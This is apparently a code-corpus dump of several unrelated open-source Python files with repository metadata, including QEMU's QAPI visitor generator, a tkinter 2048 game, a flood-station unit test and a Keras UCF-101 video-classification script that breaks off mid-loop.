if comptype == 'd.b.h.':
(eqn2, eqtype2, eqstr2, a2, b2, c2, d2, e2, AppsMin2, AppsMax2) = growth_calc_eqn2(dbconn, speccode, region, 'tree ht')
newval = eqn2(currval, a2, b2, c2, d2, e2)
newdbh = currval
newht = newval
else:
#(eqn2, eqtype2, eqstr2, a2, b2, c2, d2, e2, AppsMin2, AppsMax2) = growth_calc_eqn2(dbconn, speccode, region, 'd.b.h.')
#newval = eqn2(currval, a2, b2, c2, d2, e2)
newht = currval
newdbh = None
return (newdbh, newht, eqtype, AppsMin, AppsMax)
| 47.225225 | 173 | 0.582869 |
cffdac8ff97bce692671550aaa1b020349950469 | 9,669 | py | Python | scripts/qapi/visit.py | nonomal/UTM | 758372318887710a74791ac4c6af175a0fe363d0 | [
"Apache-2.0"
] | 1 | 2022-02-17T04:51:18.000Z | 2022-02-17T04:51:18.000Z | scripts/qapi/visit.py | nonomal/UTM | 758372318887710a74791ac4c6af175a0fe363d0 | [
"Apache-2.0"
] | null | null | null | scripts/qapi/visit.py | nonomal/UTM | 758372318887710a74791ac4c6af175a0fe363d0 | [
"Apache-2.0"
] | 1 | 2020-02-23T04:35:10.000Z | 2020-02-23T04:35:10.000Z | """
QAPI visitor generator
Copyright IBM, Corp. 2011
Copyright (C) 2014-2018 Red Hat, Inc.
Authors:
Anthony Liguori <aliguori@us.ibm.com>
Michael Roth <mdroth@linux.vnet.ibm.com>
Markus Armbruster <armbru@redhat.com>
This work is licensed under the terms of the GNU GPL, version 2.
See the COPYING file in the top-level directory.
"""
from qapi.common import *
from qapi.gen import QAPISchemaModularCVisitor, ifcontext
from qapi.schema import QAPISchemaObjectType
def gen_visit_decl(name, scalar=False):
c_type = c_name(name) + ' *'
if not scalar:
c_type += '*'
return mcgen('''
bool visit_type_%(c_name)s(Visitor *v, const char *name, %(c_type)sobj, Error **errp);
''',
c_name=c_name(name), c_type=c_type)
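# Example (sketch): for a QAPI type named 'Foo', gen_visit_decl('Foo') emits
#   bool visit_type_Foo(Visitor *v, const char *name, Foo **obj, Error **errp);
# while gen_visit_decl('Foo', scalar=True) drops one level of indirection ('Foo *obj'),
# assuming c_name() maps the identifier 'Foo' to itself.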
def gen_visit_members_decl(name):
return mcgen('''
bool visit_type_%(c_name)s_members(Visitor *v, %(c_name)s *obj, Error **errp);
''',
c_name=c_name(name))
def gen_visit_object_members(name, base, members, variants):
ret = mcgen('''
bool visit_type_%(c_name)s_members(Visitor *v, %(c_name)s *obj, Error **errp)
{
''',
c_name=c_name(name))
if base:
ret += mcgen('''
if (!visit_type_%(c_type)s_members(v, (%(c_type)s *)obj, errp)) {
return false;
}
''',
c_type=base.c_name())
for memb in members:
ret += gen_if(memb.ifcond)
if memb.optional:
ret += mcgen('''
if (visit_optional(v, "%(name)s", &obj->has_%(c_name)s)) {
''',
name=memb.name, c_name=c_name(memb.name))
push_indent()
ret += mcgen('''
if (!visit_type_%(c_type)s(v, "%(name)s", &obj->%(c_name)s, errp)) {
return false;
}
''',
c_type=memb.type.c_name(), name=memb.name,
c_name=c_name(memb.name))
if memb.optional:
pop_indent()
ret += mcgen('''
}
''')
ret += gen_endif(memb.ifcond)
if variants:
ret += mcgen('''
switch (obj->%(c_name)s) {
''',
c_name=c_name(variants.tag_member.name))
for var in variants.variants:
case_str = c_enum_const(variants.tag_member.type.name,
var.name,
variants.tag_member.type.prefix)
ret += gen_if(var.ifcond)
if var.type.name == 'q_empty':
# valid variant and nothing to do
ret += mcgen('''
case %(case)s:
break;
''',
case=case_str)
else:
ret += mcgen('''
case %(case)s:
return visit_type_%(c_type)s_members(v, &obj->u.%(c_name)s, errp);
''',
case=case_str,
c_type=var.type.c_name(), c_name=c_name(var.name))
ret += gen_endif(var.ifcond)
ret += mcgen('''
default:
abort();
}
''')
ret += mcgen('''
return true;
}
''')
return ret
def gen_visit_list(name, element_type):
return mcgen('''
bool visit_type_%(c_name)s(Visitor *v, const char *name, %(c_name)s **obj, Error **errp)
{
bool ok = false;
%(c_name)s *tail;
size_t size = sizeof(**obj);
if (!visit_start_list(v, name, (GenericList **)obj, size, errp)) {
return false;
}
for (tail = *obj; tail;
tail = (%(c_name)s *)visit_next_list(v, (GenericList *)tail, size)) {
if (!visit_type_%(c_elt_type)s(v, NULL, &tail->value, errp)) {
goto out_obj;
}
}
ok = visit_check_list(v, errp);
out_obj:
visit_end_list(v, (void **)obj);
if (!ok && visit_is_input(v)) {
qapi_free_%(c_name)s(*obj);
*obj = NULL;
}
return ok;
}
''',
c_name=c_name(name), c_elt_type=element_type.c_name())
def gen_visit_enum(name):
return mcgen('''
bool visit_type_%(c_name)s(Visitor *v, const char *name, %(c_name)s *obj, Error **errp)
{
int value = *obj;
bool ok = visit_type_enum(v, name, &value, &%(c_name)s_lookup, errp);
*obj = value;
return ok;
}
''',
c_name=c_name(name))
def gen_visit_alternate(name, variants):
ret = mcgen('''
bool visit_type_%(c_name)s(Visitor *v, const char *name, %(c_name)s **obj, Error **errp)
{
bool ok = false;
if (!visit_start_alternate(v, name, (GenericAlternate **)obj,
sizeof(**obj), errp)) {
return false;
}
if (!*obj) {
/* incomplete */
assert(visit_is_dealloc(v));
ok = true;
goto out_obj;
}
switch ((*obj)->type) {
''',
c_name=c_name(name))
for var in variants.variants:
ret += gen_if(var.ifcond)
ret += mcgen('''
case %(case)s:
''',
case=var.type.alternate_qtype())
if isinstance(var.type, QAPISchemaObjectType):
ret += mcgen('''
if (!visit_start_struct(v, name, NULL, 0, errp)) {
break;
}
if (visit_type_%(c_type)s_members(v, &(*obj)->u.%(c_name)s, errp)) {
ok = visit_check_struct(v, errp);
}
visit_end_struct(v, NULL);
''',
c_type=var.type.c_name(),
c_name=c_name(var.name))
else:
ret += mcgen('''
ok = visit_type_%(c_type)s(v, name, &(*obj)->u.%(c_name)s, errp);
''',
c_type=var.type.c_name(),
c_name=c_name(var.name))
ret += mcgen('''
break;
''')
ret += gen_endif(var.ifcond)
ret += mcgen('''
case QTYPE_NONE:
abort();
default:
assert(visit_is_input(v));
error_setg(errp, QERR_INVALID_PARAMETER_TYPE, name ? name : "null",
"%(name)s");
/* Avoid passing invalid *obj to qapi_free_%(c_name)s() */
g_free(*obj);
*obj = NULL;
}
out_obj:
visit_end_alternate(v, (void **)obj);
if (!ok && visit_is_input(v)) {
qapi_free_%(c_name)s(*obj);
*obj = NULL;
}
return ok;
}
''',
name=name, c_name=c_name(name))
return ret
def gen_visit_object(name, base, members, variants):
return mcgen('''
bool visit_type_%(c_name)s(Visitor *v, const char *name, %(c_name)s **obj, Error **errp)
{
bool ok = false;
if (!visit_start_struct(v, name, (void **)obj, sizeof(%(c_name)s), errp)) {
return false;
}
if (!*obj) {
/* incomplete */
assert(visit_is_dealloc(v));
ok = true;
goto out_obj;
}
if (!visit_type_%(c_name)s_members(v, *obj, errp)) {
goto out_obj;
}
ok = visit_check_struct(v, errp);
out_obj:
visit_end_struct(v, (void **)obj);
if (!ok && visit_is_input(v)) {
qapi_free_%(c_name)s(*obj);
*obj = NULL;
}
return ok;
}
''',
c_name=c_name(name))
class QAPISchemaGenVisitVisitor(QAPISchemaModularCVisitor):
def __init__(self, prefix):
super().__init__(
prefix, 'qapi-visit', ' * Schema-defined QAPI visitors',
' * Built-in QAPI visitors', __doc__)
def _begin_system_module(self, name):
self._genc.preamble_add(mcgen('''
#include "qemu-compat.h"
#include "error.h"
#include "qapi-builtin-visit.h"
'''))
self._genh.preamble_add(mcgen('''
#include "visitor.h"
#include "qapi-builtin-types.h"
'''))
def _begin_user_module(self, name):
types = self._module_basename('qapi-types', name)
visit = self._module_basename('qapi-visit', name)
self._genc.preamble_add(mcgen('''
#include "qemu-compat.h"
#include "error.h"
#include "qerror.h"
#include "%(visit)s.h"
''',
visit=visit))
self._genh.preamble_add(mcgen('''
#include "qapi-builtin-visit.h"
#include "%(types)s.h"
''',
types=types))
def visit_enum_type(self, name, info, ifcond, features, members, prefix):
with ifcontext(ifcond, self._genh, self._genc):
self._genh.add(gen_visit_decl(name, scalar=True))
self._genc.add(gen_visit_enum(name))
def visit_array_type(self, name, info, ifcond, element_type):
with ifcontext(ifcond, self._genh, self._genc):
self._genh.add(gen_visit_decl(name))
self._genc.add(gen_visit_list(name, element_type))
def visit_object_type(self, name, info, ifcond, features,
base, members, variants):
# Nothing to do for the special empty builtin
if name == 'q_empty':
return
with ifcontext(ifcond, self._genh, self._genc):
self._genh.add(gen_visit_members_decl(name))
self._genc.add(gen_visit_object_members(name, base,
members, variants))
# TODO Worth changing the visitor signature, so we could
# directly use rather than repeat type.is_implicit()?
#if not name.startswith('q_'):
# only explicit types need an allocating visit
self._genh.add(gen_visit_decl(name))
self._genc.add(gen_visit_object(name, base, members, variants))
def visit_alternate_type(self, name, info, ifcond, features, variants):
with ifcontext(ifcond, self._genh, self._genc):
self._genh.add(gen_visit_decl(name))
self._genc.add(gen_visit_alternate(name, variants))
def gen_visit(schema, output_dir, prefix, opt_builtins):
vis = QAPISchemaGenVisitVisitor(prefix)
schema.visit(vis)
vis.write(output_dir, opt_builtins)
| 28.189504 | 88 | 0.555383 |
8ef462a63fe7c865f5be0ecc4a4eec880f4b343f | 732 | py | Python | src/main.py | Just-Joe/CreoMusic | 254c9ca418e8770786205b32afdd2b974e50192a | [
"Apache-2.0"
] | null | null | null | src/main.py | Just-Joe/CreoMusic | 254c9ca418e8770786205b32afdd2b974e50192a | [
"Apache-2.0"
] | null | null | null | src/main.py | Just-Joe/CreoMusic | 254c9ca418e8770786205b32afdd2b974e50192a | [
"Apache-2.0"
] | null | null | null | import time
import subprocess
import logging
# Initialise global logging
logpath = 'logs/CreoMusic.log'
log = None
def logger_init():
"""
Sets up logging process
"""
logger = logging.getLogger('creologger')
logger.setLevel(logging.DEBUG)
subprocess.call(['rm', logpath])
fh = logging.FileHandler(logpath)
form = logging.Formatter('%(asctime)s | %(message)s')
fh.setLevel(logging.DEBUG)
fh.setFormatter(form)
logger.addHandler(fh)
global log
log = logger
logger.info('Logger started.')
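# Note (sketch): logger_init() removes any previous log file with `rm`, so it assumes a
# POSIX environment; afterwards the rest of the module logs through the global `log`
# handle, e.g. log.critical('Starting CreoMusic!').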
def main():
"""
    Dispatches initialization procedures and launches the backend and interface
"""
logger_init()
log.critical('Starting CreoMusic!')
log.critical('Exiting CreoMusic!')
if __name__ == "__main__":
main()
| 19.263158 | 77 | 0.72541 |
0af5ed9f160855cd5aae5497952d00a75ee956dc | 16,305 | py | Python | 2048.py | wjthieme/Python-2048 | fa32e0ae6b5bb38de2f56f39d6ccfcc1e8b59605 | [
"MIT"
] | null | null | null | 2048.py | wjthieme/Python-2048 | fa32e0ae6b5bb38de2f56f39d6ccfcc1e8b59605 | [
"MIT"
] | null | null | null | 2048.py | wjthieme/Python-2048 | fa32e0ae6b5bb38de2f56f39d6ccfcc1e8b59605 | [
"MIT"
] | null | null | null | # 2048 by Mara Dekkers & Willem Thieme (copyright (c) 2017)
# LSC213 Computer Science II - Final assignment (All code is written by Mara and Willem)
import tkinter as tk # import the tkinter module as tk
import random as rand # import the random module as rand
def startGame(): # start a new game
global score, matrix # make sure we selected the global variables for score and matrix
matrix = [[0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0]] # set the matrix to contain zeros
score = 0 # set the score to 0
plaatsNummer() # place the first number in concordance with the 2048 game rules
plaatsNummer() # place the second number
drawScreen() # draw the screen
def openHelp(): # open the help screen and hide the main screen
screen.withdraw() # hide the main screen
screen2.deiconify() # show the help screen
def hideHelp(): # hide the help screen and open the main screen
screen2.withdraw() # hide the help screen
screen.deiconify() # show the main screen
def quitQuit(): # quit the application
screen.destroy() # destroy the main screen
screen2.destroy() # destroy the help screen
def plaatsNummer(): # place a number on the grid (either a 4 or a 2)
if len(vindNul()) == 0: return # check if there are still empty spaces on the board
randnum = rand.randint(1, 10) # get a random number from 1 to 10
vier = False # this variable will determine whether we will place a 4 or a 2.
if (randnum == 1): # one out of 10 times we will place a 4.
vier = True # set this variable to true so we know we are going to place a four
vakje = rand.choice(vindNul()) # find a random empty square
if vier: # if we decided to place a four
matrix[vakje[0]][vakje[1]] = 4 # place the four
else: # else
matrix[vakje[0]][vakje[1]] = 2 # place a two
def drawScreen(): # redraw the screen
canvas.delete("all") # clear the cavas
scoretext = "Score: " + str(score) # create a string for the score
canvas.create_text(240, 18, text=scoretext, font=('Helvetica', 24), fill='gray30') # create a text for the score
    canvas.create_rectangle(35, 35, 445, 445, fill='ivory3', outline='ivory3') # create the background
n = 0 # these three variable are to count which square we are currently evaluating
x = 0
y = 0
while n < 16:
outlinecolor = 'seashell4' # set the outline color
if matrix[y][x] == 0: # all these Ifs will set the square color for the different values.
squarecolor = 'ivory2'
elif matrix[y][x] == 2:
squarecolor = 'ivory'
elif matrix[y][x] == 4:
squarecolor = 'light yellow'
elif matrix[y][x] == 8:
squarecolor = 'sandy brown'
elif matrix[y][x] == 16:
squarecolor = 'coral'
elif matrix[y][x] == 32:
squarecolor = 'tomato'
elif matrix[y][x] == 64:
squarecolor = 'orange red'
elif matrix[y][x] == 128:
squarecolor = 'LightGoldenrod1'
elif matrix[y][x] == 256:
squarecolor = 'khaki'
elif matrix[y][x] == 512:
squarecolor = 'goldenrod1'
elif matrix[y][x] == 1024:
squarecolor = 'gold2'
elif matrix[y][x] == 2048:
squarecolor = 'orange2'
elif matrix[y][x] == 4096:
squarecolor = 'seagreen2'
elif matrix[y][x] == 8192:
squarecolor = 'seagreen3'
elif matrix[y][x] == 16384:
squarecolor = 'aquamarine2'
elif matrix[y][x] == 32768:
squarecolor = 'turquoise2'
elif matrix[y][x] == 65536:
squarecolor = 'turquoise3'
elif matrix[y][x] == 131072:
squarecolor = 'mediumpurple1'
canvas.create_rectangle(x * 100 + 45, y * 100 + 45, x * 100 + 135, y * 100 + 135, fill=squarecolor,
outline=squarecolor) # draw a square
if matrix[y][x] != 0: # set text color for the number in the squares.
if matrix[y][x] < 5:
textcolor = 'gray30'
else:
textcolor = 'white'
canvas.create_text(x * 100 + 90, y * 100 + 90, text=matrix[y][x], fill=textcolor,
font=('Helvetica', 36)) # write the text in the square
n += 1 # set our counter +1
x += 1 # set the x-coord +1
if x == 4: # if we're at the end of the row of the matrix we move down one row
x = 0
y += 1
if not (moveUpPossible()) and not (moveDownPossible()) and not (moveLeftPossible()) and not (
moveRightPossible()): # if there are no moves possible
canvas.create_text(240, 190, text="Game", font=('Helvetica', 64), fill='gray30') # set the game over text
canvas.create_text(240, 290, text="Over", font=('Helvetica', 64), fill='gray30') # ^^
def vindNul(): # find each square that doesn't have a block in it
    nullen = [] # initialize variable nullen
x = 0 # set our coordinates to 0.
y = 0
for list in matrix: # our matrix is actually a list of lists so in order to run through each single item we must have two for loops.
for vakje in list: # this for loop runs through each single square
if vakje == 0: # if the value of the square is 0.
nullen.append([y, x]) # add the coordinates to the variable nullen
            x += 1 # increment the x coordinate
y += 1 # up the y coordinate
x = 0 # set x back to 0 to start on the first square of the next row
return nullen # return the variable nullen
def vindNietNul(
omgekeerd=False): # find all the squares that do have a block in it (look at the comments for the function above)
nietNullen = [] # this function does pretty much the same as the previous one except that it returns all the squares that have a block in it
x = 0
y = 0
for list in matrix:
for vakje in list:
if vakje != 0:
nietNullen.append([y, x])
x += 1
y += 1
x = 0
if omgekeerd: # if we want the list of coordinates to be reversed we do that here.
nietNullen.reverse() # reverse the list of coordinates
return nietNullen
def addScore(number): # add a number to score
global score # make sure we selected the global score
score += number # add number to score
def up(index): # move a block upwards (nested function)
if (index[0] == 0): return # if the square is on the edge we can't move it upwards so we return.
if (matrix[index[0] - 1][index[1]] != 0): # check whether the square above is not a zero
if (matrix[index[0] - 1][index[1]] == matrix[index[0]][
index[1]]): # if the square above is the same as the square we are looking at.
addScore(matrix[index[0]][index[1]] * 2) # we add a number to the score
matrix[index[0] - 1][index[1]] += matrix[index[0] - 1][index[1]] # we add the two squares together
matrix[index[0]][index[1]] = 0 # and remove the initial square
return # exit the function because we have moved the square
if (matrix[index[0] - 1][index[1]] == 0): # check whether the square above is empty
matrix[index[0] - 1][index[1]] = matrix[index[0]][index[1]] # move the square one up
matrix[index[0]][index[1]] = 0 # remove the initial square
up([index[0] - 1, index[1]]) # check whether we can move the square up again.
def down(index): # move a block downwards (nested function) (look at the comments for the function above)
if (index[0] == len(matrix) - 1): return
if (matrix[index[0] + 1][index[1]] != 0):
if (matrix[index[0] + 1][index[1]] == matrix[index[0]][index[1]]):
addScore(matrix[index[0]][index[1]] * 2)
matrix[index[0] + 1][index[1]] += matrix[index[0] + 1][index[1]]
matrix[index[0]][index[1]] = 0
return
if (matrix[index[0] + 1][index[1]] == 0):
matrix[index[0] + 1][index[1]] = matrix[index[0]][index[1]]
matrix[index[0]][index[1]] = 0
down([index[0] + 1, index[1]])
def left(index): # move a block left (nested function) (look at the comments for the function above)
if (index[1] == 0): return
if (matrix[index[0]][index[1] - 1] != 0):
if (matrix[index[0]][index[1] - 1] == matrix[index[0]][index[1]]):
addScore(matrix[index[0]][index[1]] * 2)
matrix[index[0]][index[1] - 1] += matrix[index[0]][index[1] - 1]
matrix[index[0]][index[1]] = 0
return
if (matrix[index[0]][index[1] - 1] == 0):
matrix[index[0]][index[1] - 1] = matrix[index[0]][index[1]]
matrix[index[0]][index[1]] = 0
left([index[0], index[1] - 1])
def right(index): # move a block right (nested function) (look at the comments for the function above)
if (index[1] == len(matrix) - 1): return
if (matrix[index[0]][index[1] + 1] != 0):
if (matrix[index[0]][index[1] + 1] == matrix[index[0]][index[1]]):
addScore(matrix[index[0]][index[1]] * 2)
matrix[index[0]][index[1] + 1] += matrix[index[0]][index[1] + 1]
matrix[index[0]][index[1]] = 0
return
if (matrix[index[0]][index[1] + 1] == 0):
matrix[index[0]][index[1] + 1] = matrix[index[0]][index[1]]
matrix[index[0]][index[1]] = 0
right([index[0], index[1] + 1])
def moveUpPossible(): # find out if it is possible to move a block upwards
    for index in vindNietNul(): # find all the occupied squares and execute the next check for each square
if (index[0] == 0): continue # if the square is on the border: Continue
if (matrix[index[0] - 1][index[1]] == 0 or matrix[index[0] - 1][index[1]] == matrix[index[0]][
index[1]]): # if the square above is empty or the same as the square we are currently evaluating
return True # that means we can still move upwards so we return true.
return False # else when there is no move possible we return false.
def moveDownPossible(): # find out if it is possible to move a block downwards (look at the comments for the function above)
for index in vindNietNul(True):
if (index[0] == len(matrix) - 1): continue
if (matrix[index[0] + 1][index[1]] == 0 or matrix[index[0] + 1][index[1]] == matrix[index[0]][index[1]]):
return True
return False
def moveLeftPossible(): # find out if it is possible to move a block left (look at the comments for the function above)
for index in vindNietNul():
if (index[1] == 0): continue
if (matrix[index[0]][index[1] - 1] == 0 or matrix[index[0]][index[1] - 1] == matrix[index[0]][index[1]]):
return True
return False
def moveRightPossible(): # find out if it is possible to move a block right (look at the comments for the function above)
for index in vindNietNul(True):
if (index[1] == len(matrix) - 1): continue
if (matrix[index[0]][index[1] + 1] == 0 or matrix[index[0]][index[1] + 1] == matrix[index[0]][index[1]]):
return True
return False
def key(
        event): # this function handles what happens when a key is pressed (both the arrow keys and the "wasd" keys work, via keysym and char)
    if (event.keysym == 'Up' or event.char == 'w'): # check whether the key that is pressed is the up arrow or w
if not (moveUpPossible()): return # if we can't move upwards we do nothing.
for index in vindNietNul(): # for each square that is currently on the board:
up(index) # we move it up.
    elif (event.keysym == 'Down' or event.char == 's'): # check whether the key that is pressed is the down arrow or s
if not (moveDownPossible()): return # if we can't move downwards we do nothing.
for index in vindNietNul(
True): # for each square that is currently on the board: (for moving down we reverse the list of coordinates because we want to evaluate the squares in a reversed order)
down(index) # we move it down.
    elif (event.keysym == 'Left' or event.char == 'a'): # check whether the key that is pressed is the left arrow or a
if not (moveLeftPossible()): return # if we can't move left we do nothing.
for index in vindNietNul(): # for each square that is currently on the board:
left(index) # we move it left.
    elif (event.keysym == 'Right' or event.char == 'd'): # check whether the key that is pressed is the right arrow or d
if not (moveRightPossible()): return # if we can't move right we do nothing.
for index in vindNietNul(
True): # for each square that is currently on the board: (for moving down we reverse the list of coordinates because we want to evaluate the squares in a reversed order)
right(index) # we move it right.
    else: # if the key is not an arrow key or one of the wasd keys
return # then we do nothing.
plaatsNummer() # place a new number on the board
drawScreen() # redraw the screen on the gui
score = 0 # set the score to 0
matrix = [[0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0]] # set the matrix to contain zeros
screen = tk.Tk() # create a screen for the game
screen.wm_title("2048") # set the title of the screen
screen.bind("<Key>", key) # set the keylistener for the frame
screen.geometry('%dx%d+%d+%d' % (500, 500, (screen.winfo_screenwidth() / 2) - 250,
(screen.winfo_screenheight() / 2) - 300)) # set the position and size of the frame
screen.protocol('WM_DELETE_WINDOW', quitQuit) # set what happens when the window is closed
screen.attributes("-topmost", True) # set the window to be always on top
gameScherm = tk.Frame(screen, borderwidth=10) # create a frame which we will add the widgets to
gameScherm.pack() # pack the frame
canvas = tk.Canvas(gameScherm, width=500, height=450) # add a canvas to draw the board
canvas.pack(anchor='center') # pack the canvas
quitButton = tk.Button(gameScherm, text="Quit", bd=5, command=lambda: quitQuit()) # add a quit button
quitButton.pack(side='right') # pack the quit button
restartButton = tk.Button(gameScherm, text="Restart", bd=5, command=lambda: startGame()) # add a restart button
restartButton.pack(side='left') # pack the restart button
helpButton = tk.Button(gameScherm, text="Help", bd=5, command=lambda: openHelp()) # add a help button
helpButton.pack(anchor='center') # pack the help button
screen2 = tk.Tk() # create a second screen for the help window
screen2.wm_title("Help") # set the title
screen2.attributes("-topmost", True) # make sure the screen is always on top
screen2.geometry('%dx%d+%d+%d' % (
250, 105, (screen.winfo_screenwidth() / 2) - 125, (screen.winfo_screenheight() / 2) - 100)) # set the location and size
screen2.protocol('WM_DELETE_WINDOW', hideHelp) # set what happens when you close the window
screen2.configure(background="ivory2") # set the background color
screen2.withdraw() # hide the help screen because we start on the main window
helpScherm = tk.Frame(screen2, borderwidth=10) # add a frame to the help screen
helpScherm.configure(background="ivory2") # set the background color
helpScherm.pack() # pack the frame
label = tk.Label(helpScherm, bd=5, font=('Helvetica', 14)) # add a label
label.configure(
text="Hi! Welcome to 2048. \n Move the arrows or the \"wasd\" keys. \n Swipe the numbers and get to 2048!") # set the helptext on the label
label.configure(background="ivory2", highlightcolor="ivory2", highlightbackground="ivory2") # set the background color
label.pack() # pack the label
quitHelpButton = tk.Button(helpScherm, text="Quit", bd=5, command=lambda: hideHelp()) # add a button to the help screen
quitHelpButton.configure(background="ivory2", highlightcolor="ivory2",
highlightbackground="ivory2") # set the background color
quitHelpButton.pack(anchor="s") # pack the button
startGame() # call the function start game
screen.mainloop() # call the method that starts the screen
screen2.mainloop() # call the method that starts the helpscreen. Remember, we've hidden this screen so it won't show up yet.
| 51.598101 | 186 | 0.621466 |
3593d9078bf13e8341efc0ec1435a514c9802103 | 1,059 | py | Python | test_station.py | Lab-Group-61/LG61-Flood-Warning | f4eac4f11c398c2c475d7eebe151c409c2c61942 | [
"MIT"
] | null | null | null | test_station.py | Lab-Group-61/LG61-Flood-Warning | f4eac4f11c398c2c475d7eebe151c409c2c61942 | [
"MIT"
] | null | null | null | test_station.py | Lab-Group-61/LG61-Flood-Warning | f4eac4f11c398c2c475d7eebe151c409c2c61942 | [
"MIT"
] | null | null | null | # Copyright (C) 2018 Garth N. Wells
#
# SPDX-License-Identifier: MIT
"""Unit test for the station submodule"""
from floodsystem.station import MonitoringStation, inconsistent_typical_range_stations
def test_create_monitoring_station():
# Create a station
s_id = "test-s-id"
m_id = "test-m-id"
label = "some station"
coord = (-2.0, 4.0)
trange = (2, 1) # Note the inconsistent range
river = "River X"
town = "My Town"
s = MonitoringStation(s_id, m_id, label, coord, trange, river, town)
assert s.station_id == s_id
assert s.measure_id == m_id
assert s.name == label
assert s.coord == coord
assert s.typical_range == trange
assert s.river == river
assert s.town == town
assert s.typical_range_consistent() == False # Test for Task 1F
assert s.relative_water_level() == None # Test for Task 2B
t = MonitoringStation("test-t-id", m_id, label, coord, trange, river, town)
a = [s,t]
assert(isinstance((inconsistent_typical_range_stations(a)),list)) == True # Test for Task 1F
| 32.090909 | 96 | 0.673277 |
7b8e2fcd09123dbcd6fffa3ebd2f30ab39bdcf66 | 17,719 | py | Python | code/YOLO101_1Resolusi_320x240_TrainCDV2.py | mlcv-lab/mr3dcapsnet | d0b37ca085073257b0c485210ec92a5c6e7d9bb6 | [
"Apache-2.0"
] | null | null | null | code/YOLO101_1Resolusi_320x240_TrainCDV2.py | mlcv-lab/mr3dcapsnet | d0b37ca085073257b0c485210ec92a5c6e7d9bb6 | [
"Apache-2.0"
] | null | null | null | code/YOLO101_1Resolusi_320x240_TrainCDV2.py | mlcv-lab/mr3dcapsnet | d0b37ca085073257b0c485210ec92a5c6e7d9bb6 | [
"Apache-2.0"
] | 1 | 2021-02-21T16:07:39.000Z | 2021-02-21T16:07:39.000Z | # -*- coding: utf-8 -*-
"""
Created on Fri Jul 14 13:24:34 2017
@author: user
"""
#from keras.preprocessing.image import ImageDataGenerator
#from keras.models import Sequential
#from keras.layers.core import Dense, Dropout, Activation, Flatten, SpatialDropout3D, Merge
#from keras.layers.convolutional import Convolution3D, MaxPooling3D
from keras.optimizers import SGD, RMSprop, Adam
from keras.utils import np_utils, generic_utils
import os
import pandas as pd
import matplotlib
from keras.callbacks import ModelCheckpoint
import keras.callbacks
import matplotlib.pyplot as plt
import numpy as np
import cv2
from sklearn.cross_validation import train_test_split
from sklearn import cross_validation
import csv
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Sequential
from keras.layers.core import Dense, Dropout, Activation, Flatten, SpatialDropout3D
from keras.layers.convolutional import Convolution3D, MaxPooling3D
from sklearn.metrics import classification_report,confusion_matrix,cohen_kappa_score,roc_auc_score
#from keras.regularizers import l2, l1, WeightRegularizer
from keras.layers.normalization import BatchNormalization
def getLabelFromIdx(x):
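    # map a 1-based class index (1..101) to its UCF-101 action label; unknown indices return "----"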
return {
1 : 'ApplyEyeMakeup',
2 : 'ApplyLipstick',
3 : 'Archery',
4 : 'BabyCrawling',
5 : 'BalanceBeam',
6 : 'BandMarching',
7 : 'BaseballPitch',
8 : 'Basketball',
9 : 'BasketballDunk',
10 : 'BenchPress',
11 : 'Biking',
12 : 'Billiards',
13 : 'BlowDryHair',
14 : 'BlowingCandles',
15 : 'BodyWeightSquats',
16 : 'Bowling',
17 : 'BoxingPunchingBag',
18 : 'BoxingSpeedBag',
19 : 'BreastStroke',
20 : 'BrushingTeeth',
21 : 'CleanAndJerk',
22 : 'CliffDiving',
23 : 'CricketBowling',
24 : 'CricketShot',
25 : 'CuttingInKitchen',
26 : 'Diving',
27 : 'Drumming',
28 : 'Fencing',
29 : 'FieldHockeyPenalty',
30 : 'FloorGymnastics',
31 : 'FrisbeeCatch',
32 : 'FrontCrawl',
33 : 'GolfSwing',
34 : 'Haircut',
35 : 'Hammering',
36 : 'HammerThrow',
37 : 'HandstandPushups',
38 : 'HandstandWalking',
39 : 'HeadMassage',
40 : 'HighJump',
41 : 'HorseRace',
42 : 'HorseRiding',
43 : 'HulaHoop',
44 : 'IceDancing',
45 : 'JavelinThrow',
46 : 'JugglingBalls',
47 : 'JumpingJack',
48 : 'JumpRope',
49 : 'Kayaking',
50 : 'Knitting',
51 : 'LongJump',
52 : 'Lunges',
53 : 'MilitaryParade',
54 : 'Mixing',
55 : 'MoppingFloor',
56 : 'Nunchucks',
57 : 'ParallelBars',
58 : 'PizzaTossing',
59 : 'PlayingCello',
60 : 'PlayingDaf',
61 : 'PlayingDhol',
62 : 'PlayingFlute',
63 : 'PlayingGuitar',
64 : 'PlayingPiano',
65 : 'PlayingSitar',
66 : 'PlayingTabla',
67 : 'PlayingViolin',
68 : 'PoleVault',
69 : 'PommelHorse',
70 : 'PullUps',
71 : 'Punch',
72 : 'PushUps',
73 : 'Rafting',
74 : 'RockClimbingIndoor',
75 : 'RopeClimbing',
76 : 'Rowing',
77 : 'SalsaSpin',
78 : 'ShavingBeard',
79 : 'Shotput',
80 : 'SkateBoarding',
81 : 'Skiing',
82 : 'Skijet',
83 : 'SkyDiving',
84 : 'SoccerJuggling',
85 : 'SoccerPenalty',
86 : 'StillRings',
87 : 'SumoWrestling',
88 : 'Surfing',
89 : 'Swing',
90 : 'TableTennisShot',
91 : 'TaiChi',
92 : 'TennisSwing',
93 : 'ThrowDiscus',
94 : 'TrampolineJumping',
95 : 'Typing',
96 : 'UnevenBars',
97 : 'VolleyballSpiking',
98 : 'WalkingWithDog',
99 : 'WallPushups',
100 : 'WritingOnBoard',
101 : 'YoYo'
}.get(x, "----")
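# target widths (x) and heights (y) for the three resolution streams passed to cv2.resize, plus the number of frames kept per clip (RDepth)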
R1x = 240
R1y = 320
R2x = 20
R2y = 30
R3x = 20
R3y = 30
RDepth = 32
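# vartuning names the experiment variant; the per-run results are appended to a CSV file named after it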
vartuning = '1Resolusi_320x240'
filenya = 'UCFV1_' + vartuning + '.csv'
with open(filenya, 'w') as out_file:
writer = csv.writer(out_file, lineterminator = '\n')
grup = []
    grup.append('Block no.')
    grup.append('Accuracy score')
    grup.append('Kappa score')
writer.writerows([grup])
grup = []
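    # containers for the clips of each resolution stream and their labels, kept separately for the train and test splits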
X_train_R1 = []
X_train_R2 = []
X_train_R3 = []
labels_train = []
count_train = 0
X_test_R1 = []
X_test_R2 = []
X_test_R3 = []
labels_test = []
count_test = 0
    # load the test and training clips for every action class
    for labelIdx in range(1, 102): # class indices 1..101 as defined in getLabelFromIdx
print labelIdx
listing = os.listdir('TestData/' + getLabelFromIdx(labelIdx) + '/')
for vid in listing:
vid = 'TestData/' + getLabelFromIdx(labelIdx) + '/' +vid
framesR1 = []
framesR2 = []
